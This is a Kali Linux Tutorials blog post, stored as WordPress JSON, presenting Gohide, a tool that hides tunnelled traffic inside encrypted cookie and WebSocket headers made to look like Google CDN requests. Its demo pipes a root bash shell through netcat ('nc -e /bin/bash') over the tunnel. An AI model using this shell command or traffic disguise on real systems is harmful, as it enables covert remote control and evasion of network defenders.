{"id":26872,"date":"2022-09-13T05:00:50","date_gmt":"2022-09-13T05:00:50","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=26872"},"modified":"2022-09-13T05:00:52","modified_gmt":"2022-09-13T05:00:52","slug":"gohide","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/gohide\/","title":{"rendered":"Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption"},"content":{"rendered":"\n<p><strong>Gohide<\/strong>, Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.<\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><strong>Obfuscation Modes<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Session Cookie HTTP GET (http-client)<\/li><li>Set-Cookie Session Cookie HTTP\/2 200 OK (http-server)<\/li><li>WebSocket Handshake &#8220;Sec-WebSocket-Key&#8221; (websocket-client)<\/li><li>WebSocket Handshake &#8220;Sec-WebSocket-Accept&#8221; (websocket-server)<\/li><li>No obfuscation, just use AES-GCM encrypted messages (none)<\/li><\/ul>\n\n\n\n<p>AES-GCM is enabled by default for each of the options above.<\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><strong>Usage<\/strong><\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>root@WOPR-KALI:\/opt\/gohide-dev# .\/gohide -h<br>Usage of .\/gohide:<br>-f string<br>listen fake server -r x.x.x.x:xxxx (ip\/domain:port) (default &#8220;0.0.0.0:8081&#8221;)<br>-key openssl passwd -1 -salt ok | md5sum<br>aes encryption secret: use &#8216;-k openssl passwd -1 -salt ok | md5sum&#8217; to derive key from password (default &#8220;5fe10ae58c5ad02a6113305f4e702d07&#8221;)<br>-l string<br>listen port forward -l x.x.x.x:xxxx (ip\/domain:port) (default &#8220;127.0.0.1:8080&#8221;)<br>-m string<br>obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default &#8220;none&#8221;)<br>-pem string<br>path to .pem for TLS encryption mode: default = use hardcoded key pair &#8216;CN:target.com&#8217;, none = plaintext mode (default &#8220;default&#8221;)<br>-r string<br>forward to remote fake server -r x.x.x.x:xxxx (ip\/domain:port) (default &#8220;127.0.0.1:9999&#8221;)<\/strong><\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><strong>Scenario<\/strong><\/p>\n\n\n\n<p>Box A &#8211; Reverse Handler<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>root@WOPR-KALI:\/opt\/gohide# .\/gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client<br>Local Port Forward Listening: 127.0.0.1:8080<br>FakeSrv Listening: 0.0.0.0:8081<\/strong><\/p>\n\n\n\n<p>Note: \/etc\/hosts &#8220;127.0.0.1 target.com&#8221;<\/p>\n\n\n\n<p>Box B &#8211; Netcat \/bin\/bash<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>root@WOPR-KALI:\/var\/tmp# nc -e \/bin\/bash 127.0.0.1 9090<\/strong><\/p>\n\n\n\n<p>Box A &#8211; Netcat client<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>root@WOPR-KALI:\/opt\/gohide# nc -v 127.0.0.1 8080<br>localhost [127.0.0.1] 8080 (http-alt) open<br>id<br>uid=0(root) gid=0(root) groups=0(root)<br>uname -a<br>Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU\/Linux<br>netstat -pantwu<br>Active Internet connections (servers and established)<br>tcp 0 0 127.0.0.1:39684 127.0.0.1:8081 ESTABLISHED 14334\/.\/gohide<\/strong><\/p>\n\n\n\n<p class=\"has-light-green-cyan-background-color has-background\"><strong>Obfuscation Samples<\/strong><\/p>\n\n\n\n<p>websocket-client (Box A to Box B)<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Sec-WebSocket-Key contains AES-GCM encrypted content e.g. &#8220;uname -a&#8221;.<\/li><\/ul>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>GET \/news\/api\/latest HTTP\/1.1<br>Host: cdn-tb0.gstatic.com<br>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Trident\/7.0; rv:11.0) like Gecko<br>Upgrade: websocket<br>Connection: Upgrade<br>Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62<br>Sec-WebSocket-Version: 13<\/strong><\/p>\n\n\n\n<p>websocket-server (Box B to Box A)<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Sec-WebSocket-Accept contains AES-GCM encrypted output.<\/li><\/ul>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>HTTP\/1.1 101 Switching Protocols<br>Upgrade: websocket<br>Connection: Upgrade<br>Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=<\/strong><\/p>\n\n\n\n<p>http-client<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Session cookie header contains AES-GCM encrypted content<\/li><\/ul>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>GET \/news\/api\/latest HTTP\/1.1<br>Host: cdn-tbn0.gstatic.com<br>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Trident\/7.0; rv:11.0) like Gecko<br>Accept: <em>\/<\/em><br>Accept-Language: en-US,en;q=0.5<br>Accept-Encoding: gzip, deflate, br<br>Referer: http:\/\/www.bbc.co.uk\/<br>Connection: keep-alive<br>Cookie: Session=R7IJ8y\/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly<\/strong><\/p>\n\n\n\n<p>http-server<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Set-Cookie header contains AES-GCM encrypted content.<\/li><\/ul>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>HTTP\/2.0 200 OK<br>content-encoding: gzip<br>content-type: text\/html; charset=utf-8<br>pragma: no-cache<br>server: nginx<br>x-content-type-options: nosniff<br>x-frame-options: SAMEORIGIN<br>x-xss-protection: 1; mode=block<br>cache-control: no-cache, no-store, must-revalidate<br>expires: Thu, 21 Nov 2019 01:07:15 GMT<br>date: Thu, 21 Nov 2019 01:07:15 GMT<br>content-length: 30330<br>vary: Accept-Encoding<br>X-Firefox-Spdy: h2<br>Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9\/rLkpf3cmh5uUCmHhy; Secure; Path=\/; HttpOnly<\/strong><\/p>\n\n\n\n<p>none<\/p>\n\n\n\n<p class=\"has-vivid-green-cyan-color has-black-background-color has-text-color has-background\"><strong>8JWxXufVora2FNa\/8m2Vnub6oiA2raV4Q5tUELJA<\/strong><\/p>\n\n\n\n<div class=\"wp-block-buttons is-content-justification-center is-layout-flex wp-container-core-buttons-is-layout-16018d1d wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-vivid-cyan-blue-background-color has-background\" href=\"https:\/\/github.com\/Potato-Industries\/gohide\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Gohide, Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption. Obfuscation Modes Session Cookie HTTP GET (http-client) Set-Cookie Session Cookie HTTP\/2 200 OK (http-server) WebSocket Handshake &#8220;Sec-WebSocket-Key&#8221; (websocket-client) WebSocket Handshake &#8220;Sec-WebSocket-Accept&#8221; (websocket-server) No obfuscation, just use AES-GCM encrypted messages (none) AES-GCM is enabled by default for each of the options above. Usage [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":26895,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[5605,5603,5604,4428],"class_list":["post-26872","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-aes-gcm-encryption","tag-gohide","tag-obfuscated-channel","tag-tunnel"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel<\/title>\n<meta name=\"description\" content=\"Gohide, Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption. Session Cookie HTTP GET (http-client).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/gohide\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel\" \/>\n<meta property=\"og:description\" content=\"Gohide, Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption. Session Cookie HTTP GET (http-client).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/gohide\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2022-09-13T05:00:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-09-13T05:00:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/gohide\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/gohide\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption\",\"datePublished\":\"2022-09-13T05:00:50+00:00\",\"dateModified\":\"2022-09-13T05:00:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/gohide\/\"},\"wordCount\":439,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/gohide\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png\",\"keywords\":[\"AES-GCM Encryption\",\"Gohide\",\"Obfuscated Channel\",\"Tunnel\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/gohide\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/gohide\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/gohide\/\",\"name\":\"Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/gohide\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/gohide\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png\",\"datePublished\":\"2022-09-13T05:00:50+00:00\",\"dateModified\":\"2022-09-13T05:00:52+00:00\",\"description\":\"Gohide, Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption. Session Cookie HTTP GET (http-client).\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/gohide\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/gohide\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png\",\"width\":\"728\",\"height\":\"380\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel","description":"Gohide, Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption. Session Cookie HTTP GET (http-client).","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/gohide\/","og_locale":"en_US","og_type":"article","og_title":"Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel","og_description":"Gohide, Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption. Session Cookie HTTP GET (http-client).","og_url":"https:\/\/kalilinuxtutorials.com\/gohide\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2022-09-13T05:00:50+00:00","article_modified_time":"2022-09-13T05:00:52+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png","type":"","width":"","height":""}],"author":"R K","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/gohide\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/gohide\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption","datePublished":"2022-09-13T05:00:50+00:00","dateModified":"2022-09-13T05:00:52+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/gohide\/"},"wordCount":439,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/gohide\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png","keywords":["AES-GCM Encryption","Gohide","Obfuscated Channel","Tunnel"],"articleSection":["Kali Linux"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/gohide\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/gohide\/","url":"https:\/\/kalilinuxtutorials.com\/gohide\/","name":"Gohide : Tunnel Port To Port Traffic Over An Obfuscated Channel","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/gohide\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/gohide\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png","datePublished":"2022-09-13T05:00:50+00:00","dateModified":"2022-09-13T05:00:52+00:00","description":"Gohide, Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption. Session Cookie HTTP GET (http-client).","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/gohide\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/gohide\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png","width":"728","height":"380"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgn1amIDFIy8pZiGhRfnjtKzWPISu0Rjo-8eXBrFSA2WrTB1I7d3J1m-6UbkcIMu71ZrCvFbi4VWQq3Ps446uMv1e8JAt-N6w3xYjQ30Hh4_Ush_CivT9iESgl3sOVZsdaNxdR0PkBs73lcW7Ko1v_uWrzySTYcHJeRTfG63QFJt-USQEB0EF39JiQB\/s728\/gohide_1%20(1).png","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":33395,"url":"https:\/\/kalilinuxtutorials.com\/wstunnel\/","url_meta":{"origin":26872,"position":0},"title":"Wstunnel &#8211; Revolutionizing Network Access Through Advanced Tunneling Techniques","author":"Varshini","date":"June 19, 2024","format":false,"excerpt":"Most of the time when you are using a public network, you are behind some kind of firewall or proxy. One of their purpose is to constrain you to only use certain kind of protocols and consult only a subset of the web. Nowadays, the most widespread protocol is http\u2026","rel":"","context":"In &quot;Hacking Tools&quot;","block_context":{"text":"Hacking Tools","link":"https:\/\/kalilinuxtutorials.com\/category\/hacking-tools\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEilaTo9cvyxmsea1tcaX9oWukhTlCYrVZhC-BvnQW3spYE9DISfHd-aIgowysTmVQlytZWfPpnWwpIw8M44WRigPfieBsAIoq30UIAb7HuD2NcWalEazE4j5GcDOg4tRIAAAptBwx83Gs4hWsgUbqF1olI7py_ZUHCc0KfTxshrSAoxuf8oAA_RZ9jWmx7M\/s16000\/Wstunnel%20.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEilaTo9cvyxmsea1tcaX9oWukhTlCYrVZhC-BvnQW3spYE9DISfHd-aIgowysTmVQlytZWfPpnWwpIw8M44WRigPfieBsAIoq30UIAb7HuD2NcWalEazE4j5GcDOg4tRIAAAptBwx83Gs4hWsgUbqF1olI7py_ZUHCc0KfTxshrSAoxuf8oAA_RZ9jWmx7M\/s16000\/Wstunnel%20.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEilaTo9cvyxmsea1tcaX9oWukhTlCYrVZhC-BvnQW3spYE9DISfHd-aIgowysTmVQlytZWfPpnWwpIw8M44WRigPfieBsAIoq30UIAb7HuD2NcWalEazE4j5GcDOg4tRIAAAptBwx83Gs4hWsgUbqF1olI7py_ZUHCc0KfTxshrSAoxuf8oAA_RZ9jWmx7M\/s16000\/Wstunnel%20.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEilaTo9cvyxmsea1tcaX9oWukhTlCYrVZhC-BvnQW3spYE9DISfHd-aIgowysTmVQlytZWfPpnWwpIw8M44WRigPfieBsAIoq30UIAb7HuD2NcWalEazE4j5GcDOg4tRIAAAptBwx83Gs4hWsgUbqF1olI7py_ZUHCc0KfTxshrSAoxuf8oAA_RZ9jWmx7M\/s16000\/Wstunnel%20.webp?resize=700%2C400&ssl=1 2x, 